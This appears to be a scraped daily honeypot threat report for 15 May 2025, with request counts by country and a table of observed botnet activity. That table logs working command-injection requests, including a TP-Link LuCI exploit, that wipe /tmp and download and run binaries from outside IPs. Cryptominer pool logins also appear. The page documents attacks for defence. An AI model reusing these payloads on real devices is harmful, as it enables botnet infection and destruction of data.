Table of Contents

Daily Report: 2025-05-15
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 13 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1169 requests were recorded during the day, originating from 4 different countries, with a peak of 211 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
FR	Germany
US	Dubai
PT	Dubai

botnet_dropper_behaviour
#

remote_addr	request
163.142.101.240	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
141.98.11.137	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
85.185.13.76	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
152.0.28.63	GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
158	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224ABPhRUtt95XoACQPdJ4k5Ugp4Z8FEuYkEFSVchqoBMReRPvQWQCtLX4fGMww6TEJtDefUrowxB3tjFNsun8qgejUWPdPKR\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
192	1	POST /api/user/binLookup?time=1747278853145799409 HTTP/1.1
204	1	GET /Crm HTTP/1.1
205	1	GET /Media HTTP/1.1
206	1	GET /Server HTTP/1.1
207	1	GET /Staging HTTP/1.1
210	1	GET /App HTTP/1.1
211	1	GET /Vendor HTTP/1.1
226	1	GET /config/index?time=1747278801226420534 HTTP/1.1
227	1	GET /api/bin/440393?time=1747278852117857625 HTTP/1.1
228	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224AosXe5cigwfojMo7reEvxNXqkzGsvpXciqd6auk2B468gQUTFk6fDZ3mivf37r2iRdzUtchvWXd5T6G25ZZXK9YU4MTmHn\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
229	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x2261ea3ea5eeb08d6e85660cf1a2d78845eef81d\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
287	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x63e30fb0c44a9d51dfa44ae05a7fb73ecb15ab00\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}

country_iso_code
#

	number_of_occurence	country_iso_code
0	211	US
1	150	GB
2	120	BG
3	84	PL
4	65	SG
5	55	KR
6	53	NL
7	51	VN
8	48	CN
9	45	PT
10	38	ES
11	38	SC
12	37	DE
13	35	CA
14	19	HK
15	17	FR
16	14	IN
17	13	AZ
18	9	IL
19	8	GH
20	8	RU
21	7	LT
22	6	MN
23	6	BE
24	5	UA
25	4	EE
26	3	JP
27	3	AR
28	2	PY
29	2	MD
30	2	BR
31	2	KW
32	2	IR
33	1	SY
34	1	MC
35	1	ID
36	1	IT
37	1	AO
38	1	DO
39	1	AT

Report: 2025-05-14

14 May 2025·403 words

Repport Daily

Report: 2025-05-13

13 May 2025·323 words

Repport Daily

Report: 2025-05-12

12 May 2025·494 words

Repport Daily

	number_of_occurence	country_iso_code
0	211	US
1	150	GB
2	120	BG
3	84	PL
4	65	SG
5	55	KR
6	53	NL
7	51	VN
8	48	CN
9	45	PT
10	38	ES
11	38	SC
12	37	DE
13	35	CA
14	19	HK
15	17	FR
16	14	IN
17	13	AZ
18	9	IL
19	8	GH
20	8	RU
21	7	LT
22	6	MN
23	6	BE
24	5	UA
25	4	EE
26	3	JP
27	3	AR
28	2	PY
29	2	MD
30	2	BR
31	2	KW
32	2	IR
33	1	SY
34	1	MC
35	1	ID
36	1	IT
37	1	AO
38	1	DO
39	1	AT

	number_of_occurence	country_iso_code
0	211	US
1	150	GB
2	120	BG
3	84	PL
4	65	SG
5	55	KR
6	53	NL
7	51	VN
8	48	CN
9	45	PT
10	38	ES
11	38	SC
12	37	DE
13	35	CA
14	19	HK
15	17	FR
16	14	IN
17	13	AZ
18	9	IL
19	8	GH
20	8	RU
21	7	LT
22	6	MN
23	6	BE
24	5	UA
25	4	EE
26	3	JP
27	3	AR
28	2	PY
29	2	MD
30	2	BR
31	2	KW
32	2	IR
33	1	SY
34	1	MC
35	1	ID
36	1	IT
37	1	AO
38	1	DO
39	1	AT

Daily Report: 2025-05-15#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-05-15
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	211	US
1	150	GB
2	120	BG
3	84	PL
4	65	SG
5	55	KR
6	53	NL
7	51	VN
8	48	CN
9	45	PT
10	38	ES
11	38	SC
12	37	DE
13	35	CA
14	19	HK
15	17	FR
16	14	IN
17	13	AZ
18	9	IL
19	8	GH
20	8	RU
21	7	LT
22	6	MN
23	6	BE
24	5	UA
25	4	EE
26	3	JP
27	3	AR
28	2	PY
29	2	MD
30	2	BR
31	2	KW
32	2	IR
33	1	SY
34	1	MC
35	1	ID
36	1	IT
37	1	AO
38	1	DO
39	1	AT